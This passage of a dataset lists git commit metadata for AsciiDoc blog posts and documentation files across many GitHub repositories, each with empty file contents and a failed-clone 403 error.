2016-6-27-file-getput-content.adoc","repos":"oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io,oppemism\/oppemism.github.io","old_file":"2016-6-27-file-getput-content.adoc","new_file":"2016-6-27-file-getput-content.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/oppemism\/oppemism.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"af82dccc53e2a0b24e69857170b911afb27313c7","subject":"Update 2015-12-10-docker-network-multihost.adoc","message":"Update 2015-12-10-docker-network-multihost.adoc","repos":"euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io,euprogramador\/euprogramador.github.io","old_file":"_posts\/2015-12-10-docker-network-multihost.adoc","new_file":"_posts\/2015-12-10-docker-network-multihost.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/euprogramador\/euprogramador.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b0f4849597f21b9f464b0aca56d9f0b08d09f00d","subject":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","message":"Update 2016-03-31-Mensajes-ocultos-parte-1.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_file":"_posts\/2016-03-31-Mensajes-ocultos-parte-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e0040f1d92909c2d5475a8608cf50e7cb1ca9843","subject":"Update 2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","message":"Update 2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","repos":"KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io,KurtStam\/kurtstam.github.io","old_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_file":"_posts\/2015-07-14-Turn-your-Raspberry-Pi-2-into-a-Hotspot.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/KurtStam\/kurtstam.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c0f4376fa736ad6752c2b50eba0fd084d4b6344a","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f413304eb98b5d60036440d140cfdfaa9822d166","subject":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","message":"Update 2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","repos":"mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io,mdramos\/mdramos.github.io","old_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_file":"_posts\/2016-07-20-Adding-Dynamic-Filters-to-a-Leaflet-Map.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mdramos\/mdramos.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ec932e822d39041cb281d202021b42ce49c3e523","subject":"Update 2017-02-09-test1.adoc","message":"Update 2017-02-09-test1.adoc","repos":"xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io,xquery\/xquery.github.io","old_file":"_posts\/2017-02-09-test1.adoc","new_file":"_posts\/2017-02-09-test1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xquery\/xquery.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9571e2c870e44d1e8ee10f6297a138d1df9fe79b","subject":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","message":"Delete the file at '_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc'","repos":"kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io,kunicmarko20\/kunicmarko20.github.io","old_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_file":"_posts\/2017-05-05-Sonata-Admin-Custom-Export-Format.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/kunicmarko20\/kunicmarko20.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"f7145cee67de42364fcaaa3ad5c9924867981f9b","subject":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","message":"Update 2016-03-28-improve-your-java-environment-with-docker.adoc","repos":"mgreau\/posts,mgreau\/posts,mgreau\/posts,mgreau\/posts","old_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_file":"_posts\/2016-03-28-improve-your-java-environment-with-docker.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mgreau\/posts.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"540a6de905f1d5971f90431edb5e3d646b4b8f48","subject":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","message":"Update 2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_file":"_posts\/2017-07-09-Serverless-Framework-E-C-M-A-Script2015-1.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"090ebcdc118d7f278cdfe88627f0f7176ccc2706","subject":"y2b create post Would You Put This On Your Phone?","message":"y2b create post Would You Put This On Your Phone?","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2017-05-26-Would-You-Put-This-On-Your-Phone.adoc","new_file":"_posts\/2017-05-26-Would-You-Put-This-On-Your-Phone.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"cb9c6d2718d0247d2a1d9798e8886aaeee1c9bb3","subject":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","message":"Update 2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","repos":"dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io,dakeshi\/dakeshi.github.io","old_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_file":"_posts\/2016-02-16-Rename-CocoaPods-Xcode-Project.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dakeshi\/dakeshi.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85070492972bff5644e1b8b8d089ce10c4455dd1","subject":"Update 2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","message":"Update 2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","repos":"AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog,AlexL777\/hubpressblog","old_file":"_posts\/2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","new_file":"_posts\/2016-02-29-Xen-Foro-Forum-Projekt-von-mir.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/AlexL777\/hubpressblog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"ef2e94cb1f454eaa6981fe5b1b67311915534bc3","subject":"job: #11748 Draft of training plan for model compiler consultation.","message":"job: #11748 Draft of training plan for model compiler consultation.\n","repos":"xtuml\/training,xtuml\/training","old_file":"doc-training\/notes\/11748_mctrain\/11748_mctrain_ant.adoc","new_file":"doc-training\/notes\/11748_mctrain\/11748_mctrain_ant.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/xtuml\/training.git\/': The requested URL returned error: 403\n","license":"cc0-1.0","lang":"AsciiDoc"} {"commit":"759f906a34583fd60264a42e0e090b8de515a261","subject":"Update 2014-10-23-I-am.adoc","message":"Update 2014-10-23-I-am.adoc","repos":"jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io,jarcane\/jarcane.github.io","old_file":"_posts\/2014-10-23-I-am.adoc","new_file":"_posts\/2014-10-23-I-am.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jarcane\/jarcane.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"2f5ad230c160062ea0383ad9a749cdfc6784ad19","subject":"Update 2015-08-18-Test.adoc","message":"Update 2015-08-18-Test.adoc","repos":"jiashengc\/blog,jiashengc\/blog,jiashengc\/blog","old_file":"_posts\/2015-08-18-Test.adoc","new_file":"_posts\/2015-08-18-Test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jiashengc\/blog.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"54b1becb5abb8ba40a11963d188bac997107e588","subject":"Update 2016-02-19-test.adoc","message":"Update 2016-02-19-test.adoc","repos":"hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress,hinaloe\/hubpress","old_file":"_posts\/2016-02-19-test.adoc","new_file":"_posts\/2016-02-19-test.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/hinaloe\/hubpress.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"d9efd08bfdc7fd18616a740b52d62721422d2fc1","subject":"SEC-2577: Add missing whitespace in reference","message":"SEC-2577: Add missing whitespace in reference\n","repos":"SanjayUser\/SpringSecurityPro,thomasdarimont\/spring-security,jgrandja\/spring-security,likaiwalkman\/spring-security,olezhuravlev\/spring-security,caiwenshu\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,olezhuravlev\/spring-security,Peter32\/spring-security,adairtaosy\/spring-security,zhaoqin102\/spring-security,mounb\/spring-security,Xcorpio\/spring-security,mdeinum\/spring-security,hippostar\/spring-security,izeye\/spring-security,ractive\/spring-security,hippostar\/spring-security,xingguang2013\/spring-security,MatthiasWinzeler\/spring-security,liuguohua\/spring-security,Peter32\/spring-security,mounb\/spring-security,mdeinum\/spring-security,rwinch\/spring-security,mounb\/spring-security,diegofernandes\/spring-security,xingguang2013\/spring-security,spring-projects\/spring-security,jmnarloch\/spring-security,cyratech\/spring-security,follow99\/spring-security,zhaoqin102\/spring-security,rwinch\/spring-security,ajdinhedzic\/spring-security,mdeinum\/spring-security,panchenko\/spring-security,jmnarloch\/spring-security,kazuki43zoo\/spring-security,Xcorpio\/spring-security,zshift\/spring-security,MatthiasWinzeler\/spring-security,spring-projects\/spring-security,izeye\/spring-security,mparaz\/spring-security,olezhuravlev\/spring-security,wkorando\/spring-security,raindev\/spring-security,panchenko\/spring-security,panchenko\/spring-security,wkorando\/spring-security,pkdevbox\/spring-security,follow99\/spring-security,driftman\/spring-security,Krasnyanskiy\/spring-security,follow99\/spring-security,rwinch\/spring-security,mdeinum\/spring-security,SanjayUser\/SpringSecurityPro,xingguang2013\/spring-security,djechelon\/spring-security,djechelon\/spring-security,raindev\/spring-security,eddumelendez\/spring-security,pkdevbox\/spring-security,jgrandja\/spring-security,zshift\/spring-security,chinazhaoht\/spring-security,izeye\/spring-security,mparaz\/spring-security,jgrandja\/spring-security,izeye\/spring-security,wkorando\/spring-security,likaiwalkman\/spring-security,vitorgv\/spring-security,mparaz\/spring-security,thomasdarimont\/spring-security,likaiwalkman\/spring-security,liuguohua\/spring-security,spring-projects\/spring-security,adairtaosy\/spring-security,djechelon\/spring-security,yinhe402\/spring-security,cyratech\/spring-security,spring-projects\/spring-security,ollie314\/spring-security,thomasdarimont\/spring-security,jmnarloch\/spring-security,Xcorpio\/spring-security,ractive\/spring-security,zgscwjm\/spring-security,pwheel\/spring-security,ollie314\/spring-security,likaiwalkman\/spring-security,diegofernandes\/spring-security,mrkingybc\/spring-security,MatthiasWinzeler\/spring-security,chinazhaoht\/spring-security,zgscwjm\/spring-security,fhanik\/spring-security,pkdevbox\/spring-security,hippostar\/spring-security,wkorando\/spring-security,MatthiasWinzeler\/spring-security,yinhe402\/spring-security,eddumelendez\/spring-security,ollie314\/spring-security,jgrandja\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,pkdevbox\/spring-security,olezhuravlev\/spring-security,Xcorpio\/spring-security,rwinch\/spring-security,mrkingybc\/spring-security,mrkingybc\/spring-security,fhanik\/spring-security,hippostar\/spring-security,diegofernandes\/spring-security,kazuki43zoo\/spring-security,diegofernandes\/spring-security,rwinch\/spring-security,Krasnyanskiy\/spring-security,kazuki43zoo\/spring-security,fhanik\/spring-security,eddumelendez\/spring-security,forestqqqq\/spring-security,cyratech\/spring-security,caiwenshu\/spring-security,caiwenshu\/spring-security,SanjayUser\/SpringSecurityPro,eddumelendez\/spring-security,pwheel\/spring-security,pwheel\/spring-security,spring-projects\/spring-security,spring-projects\/spring-security,Krasnyanskiy\/spring-security,thomasdarimont\/spring-security,zgscwjm\/spring-security,fhanik\/spring-security,kazuki43zoo\/spring-security,zhaoqin102\/spring-security,raindev\/spring-security,jgrandja\/spring-security,jmnarloch\/spring-security,spring-projects\/spring-security,yinhe402\/spring-security,vitorgv\/spring-security,adairtaosy\/spring-security,rwinch\/spring-security,ajdinhedzic\/spring-security,mounb\/spring-security,driftman\/spring-security,liuguohua\/spring-security,olezhuravlev\/spring-security,pwheel\/spring-security,mrkingybc\/spring-security,xingguang2013\/spring-security,djechelon\/spring-security,chinazhaoht\/spring-security,adairtaosy\/spring-security,ajdinhedzic\/spring-security,forestqqqq\/spring-security,zgscwjm\/spring-security,thomasdarimont\/spring-security,jgrandja\/spring-security,pwheel\/spring-security,Peter32\/spring-security,fhanik\/spring-security,Peter32\/spring-security,raindev\/spring-security,panchenko\/spring-security,Krasnyanskiy\/spring-security,yinhe402\/spring-security,mparaz\/spring-security,zshift\/spring-security,chinazhaoht\/spring-security,driftman\/spring-security,zhaoqin102\/spring-security,forestqqqq\/spring-security,vitorgv\/spring-security,ajdinhedzic\/spring-security,ractive\/spring-security,kazuki43zoo\/spring-security,driftman\/spring-security,djechelon\/spring-security,liuguohua\/spring-security,SanjayUser\/SpringSecurityPro,zshift\/spring-security,fhanik\/spring-security,SanjayUser\/SpringSecurityPro,cyratech\/spring-security,ractive\/spring-security,follow99\/spring-security,caiwenshu\/spring-security","old_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_file":"docs\/manual\/src\/asciidoc\/index.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jmnarloch\/spring-security.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"04b1650f96b188eccac3689cd4675c5bb4946911","subject":"First draft of Clojure Remote event page","message":"First draft of Clojure Remote event page\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2017\/clojureremote.adoc","new_file":"content\/events\/2017\/clojureremote.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"446d9decb5f4dd91f6c9a9be3b7cfd0b2c2ba07f","subject":"y2b create post Xbox 360 Chatpad vs. PS3 Wireless Keypad","message":"y2b create post Xbox 360 Chatpad vs. PS3 Wireless Keypad","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-10-03-Xbox-360-Chatpad-vs-PS3-Wireless-Keypad.adoc","new_file":"_posts\/2011-10-03-Xbox-360-Chatpad-vs-PS3-Wireless-Keypad.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"c5114ec10f3da8c9c9358f16955e5ebd325bc743","subject":"y2b create post Metal Gear Solid HD Collection Unboxing","message":"y2b create post Metal Gear Solid HD Collection Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-18-Metal-Gear-Solid-HD-Collection-Unboxing.adoc","new_file":"_posts\/2011-12-18-Metal-Gear-Solid-HD-Collection-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"5545a03c0237dd8f1261b7052befa269333b6767","subject":"Update 2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","message":"Update 2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","repos":"jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io,jcsirot\/hubpress.io","old_file":"_posts\/2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","new_file":"_posts\/2012-09-30-Migration-du-blog-vers-Octopress-Github.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/jcsirot\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"01397bb34beb5999548c37ca28186834719916aa","subject":"y2b create post BEST CYBER MONDAY DEALS 2012 + LIVE SHOW","message":"y2b create post BEST CYBER MONDAY DEALS 2012 + LIVE SHOW","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2012-11-26-BEST-CYBER-MONDAY-DEALS-2012--LIVE-SHOW.adoc","new_file":"_posts\/2012-11-26-BEST-CYBER-MONDAY-DEALS-2012--LIVE-SHOW.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"85c6145a9ed2f5eee03aa55190339cefd59e4d6a","subject":"This commit adds ClojureBridge Krak\u00f3w, Poland chapter","message":"This commit adds ClojureBridge Krak\u00f3w, Poland chapter\n","repos":"clojure\/clojure-site","old_file":"content\/events\/2016\/clojurebridge_krakow.adoc","new_file":"content\/events\/2016\/clojurebridge_krakow.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"057ea8312f914d6fb97cded96c50efbe3e54cddb","subject":"Adding Testing documentation","message":"Adding Testing documentation\n","repos":"beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy,beavyHQ\/beavy","old_file":"docs\/Testing.adoc","new_file":"docs\/Testing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/beavyHQ\/beavy.git\/': The requested URL returned error: 403\n","license":"mpl-2.0","lang":"AsciiDoc"} {"commit":"4b18bb1032fa176157b15be7620b51f12b319c2d","subject":"add beginning of guide","message":"add beginning of guide\n","repos":"clojure\/clojurescript-site","old_file":"content\/guides\/code-splitting.adoc","new_file":"content\/guides\/code-splitting.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojurescript-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"c4092542f1cd9772e0e285c0b5bcba51ce5961bc","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/05\/06\/deref.adoc","new_file":"content\/news\/2022\/05\/06\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"b562561d1d72d4f22ebda77195c469b3cf1c174d","subject":"add deref","message":"add deref\n","repos":"clojure\/clojure-site","old_file":"content\/news\/2022\/11\/23\/deref.adoc","new_file":"content\/news\/2022\/11\/23\/deref.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/clojure\/clojure-site.git\/': The requested URL returned error: 403\n","license":"epl-1.0","lang":"AsciiDoc"} {"commit":"715f422de7eecbbcd1e1e07e9ad0c8877308bd04","subject":"y2b create post Need For Speed The Run Limited Edition Unboxing","message":"y2b create post Need For Speed The Run Limited Edition Unboxing","repos":"live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io,live-smart\/live-smart.github.io","old_file":"_posts\/2011-12-31-Need-For-Speed-The-Run-Limited-Edition-Unboxing.adoc","new_file":"_posts\/2011-12-31-Need-For-Speed-The-Run-Limited-Edition-Unboxing.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/live-smart\/live-smart.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"e75300d467fc0457ac99fe915c59c10f5fd17f26","subject":"`usage.txt` is not displayed","message":"`usage.txt` is not displayed\n\nTry to fix it.\n","repos":"dulanov\/emerald-rs","old_file":"docs\/cli.adoc","new_file":"docs\/cli.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/dulanov\/emerald-rs.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"9597b8865233067be95e1b9fca22507de4bab64b","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fb0c7d396fb7b948d788aca9d92d20aaab9ae6e","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"6e0b2c877edac407091020dbfd107adba016d24f","subject":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","message":"Update 2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","repos":"camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io,camilo28\/camilo28.github.io","old_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_file":"_posts\/2017-01-11-El-metodo-de-Sherlock-Modelando-amenazas.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/camilo28\/camilo28.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"97ebc49d80c77922066ee2ccc2bfdfb626a59640","subject":"ISIS-2013: adds documentation","message":"ISIS-2013: adds documentation\n","repos":"apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis,apache\/isis","old_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgsvc\/_rgsvc_persistence-layer-api_H2ManagerMenu.adoc","new_file":"adocs\/documentation\/src\/main\/asciidoc\/guides\/rgsvc\/_rgsvc_persistence-layer-api_H2ManagerMenu.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/apache\/isis.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"bbc46eb021321d9e91489957189c80320af246fb","subject":"Adding release notes for release of coverage revapi_basic_features revapi_reporter_file_base revapi_ant_task revapi_java revapi_reporter_json revapi_reporter_text revapi_standalone revapi_maven_plugin","message":"Adding release notes for release of coverage revapi_basic_features revapi_reporter_file_base revapi_ant_task revapi_java revapi_reporter_json revapi_reporter_text revapi_standalone revapi_maven_plugin\n","repos":"revapi\/revapi,revapi\/revapi,revapi\/revapi","old_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210604-releases.adoc","new_file":"revapi-site\/src\/site\/modules\/news\/pages\/news\/20210604-releases.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/revapi\/revapi.git\/': The requested URL returned error: 403\n","license":"apache-2.0","lang":"AsciiDoc"} {"commit":"570e5379b32aedbfa40d3b94fc831136fa9d5f20","subject":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","message":"Update 2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","repos":"innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io,innovation-jp\/innovation-jp.github.io","old_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_file":"_posts\/2017-05-27-Difference-with-Artificial-Intelligence-and-Machine-Leaning-and-Deep-Leadning.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/innovation-jp\/innovation-jp.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"087022d80373c78268bbb7b76d41611ca1bfd0b7","subject":"Update 2016-10-04-Installing-Squid.adoc","message":"Update 2016-10-04-Installing-Squid.adoc","repos":"trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io,trycrmr\/hubpress.io","old_file":"_posts\/2016-10-04-Installing-Squid.adoc","new_file":"_posts\/2016-10-04-Installing-Squid.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/trycrmr\/hubpress.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"aeacdc27538c6f66a5e22aff0c33764ea9878f37","subject":"Update 2017-03-30-Week-1-Mapa-e-UI.adoc","message":"Update 2017-03-30-Week-1-Mapa-e-UI.adoc","repos":"mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io,mahrocks\/mahrocks.github.io","old_file":"_posts\/2017-03-30-Week-1-Mapa-e-UI.adoc","new_file":"_posts\/2017-03-30-Week-1-Mapa-e-UI.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/mahrocks\/mahrocks.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"b7c471944e2fd2f23aebea147c05e4079e83bf6d","subject":"Update 2017-09-06-Passwordless-SSH.adoc","message":"Update 2017-09-06-Passwordless-SSH.adoc","repos":"scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io,scottellis64\/scottellis64.github.io","old_file":"_posts\/2017-09-06-Passwordless-SSH.adoc","new_file":"_posts\/2017-09-06-Passwordless-SSH.adoc","new_contents":"","old_contents":"","returncode":128,"stderr":"fatal: unable to access 'https:\/\/github.com\/scottellis64\/scottellis64.github.io.git\/': The requested URL returned error: 403\n","license":"mit","lang":"AsciiDoc"} {"commit":"9fa888ca16831ac389091ca6868d610cf7060391","subject":"Update 2017-07-24-full-text-search-by-mongodb-and-elasticsearch.adoc","message":"Update 